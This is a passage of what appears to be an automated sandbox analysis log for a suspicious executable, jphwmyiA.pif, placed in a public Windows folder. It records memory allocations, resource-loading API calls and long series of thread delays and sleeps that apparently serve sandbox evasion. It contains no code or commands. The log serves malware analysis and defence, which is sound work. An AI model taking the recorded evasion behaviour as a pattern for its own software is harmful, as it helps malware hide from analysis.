                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: 1A400000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: 1C1D0000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: 1BF80000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: 223B0000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: 227E0000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: 22420000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599525Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599389Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599269Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598838Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598679Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598572Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597869Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597750Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597640Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597530Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596953Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596839Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596491Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596388Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596070Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595841Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595371Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595258Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595142Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594918Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594805Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594698Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594586Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594463Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594337Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594234Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594124Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594003Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593708Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593261Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593086Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592951Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592734Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592608Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592433Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592266Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592130Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592016Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 591890Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 591751Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 591609Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599890
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599780
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599670
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599539
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599339
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599219
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599094
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598984
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598875
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598765
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598656
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598547
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598437
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598327
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598218
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598057
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597933
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597816
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597695
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597565
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597438
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597316
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597196
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597023
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596688
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596526
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596352
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596245
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596071
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595927
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595785
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595616
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595402
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595083
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594956
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594812
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594685
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594560
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594445
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594335
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594226
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594116
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594007
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593897
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593782
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593663
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593554
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593444
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593335
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593226
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593108
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593007
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592897
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592788
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592679
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592569
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592460
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592349
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592226
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599891
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599779
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599672
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599563
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599453
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599344
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599234
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599125
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 599016
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598906
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598797
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598686
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598578
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598469
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598359
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598250
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598141
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 598016
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597844
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597725
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597588
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597481
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597375
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597266
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597156
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 597047
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596933
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596828
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596719
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596594
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596485
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596360
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596235
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 596110
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595985
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595860
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595735
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595610
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595485
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595360
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595235
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595110
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594938
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594788
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594672
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594562
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594453
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594344
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594234
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594125
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594016
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593891
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifWindow / User API: threadDelayed 1102Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifWindow / User API: threadDelayed 8676Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifWindow / User API: foregroundWindowGot 1752Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifWindow / User API: threadDelayed 6277
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifWindow / User API: threadDelayed 3508
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifWindow / User API: foregroundWindowGot 1746
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifWindow / User API: threadDelayed 7034
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifWindow / User API: threadDelayed 2787
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifWindow / User API: foregroundWindowGot 1763
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep count: 38 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7420Thread sleep count: 1102 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7420Thread sleep count: 8676 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -599641s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -599525s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -599389s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -599269s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -598838s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -598679s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -598572s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -598468s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -598359s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -598093s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -597984s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -597869s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -597750s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -597640s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -597530s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -597406s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -597297s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -597187s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -597062s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -596953s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -596839s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -596719s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -596609s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -596491s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -596388s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -596070s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -595953s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -595841s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -595734s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -595625s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -595484s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -595371s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -595258s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -595142s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -595031s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -594918s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -594805s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -594698s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -594586s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -594463s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -594337s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -594234s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -594124s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -594003s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -593708s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -593261s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -593086s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -592951s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -592734s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -592608s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -592433s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -592266s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -592130s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -592016s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -591890s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -591751s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7416Thread sleep time: -591609s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep count: 37 > 30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -34126476536362649s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -599890s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7904Thread sleep count: 6277 > 30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7904Thread sleep count: 3508 > 30
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -599780s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -599670s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -599539s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -599339s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -599219s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -599094s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -598984s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -598875s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -598765s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -598656s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -598547s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -598437s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -598327s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -598218s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -598057s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -597933s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -597816s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -597695s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -597565s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -597438s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -597316s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -597196s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -597023s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -596688s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -596526s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -596352s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -596245s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -596071s >= -30000s
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 7900Thread sleep time: -595927s >= -30000s
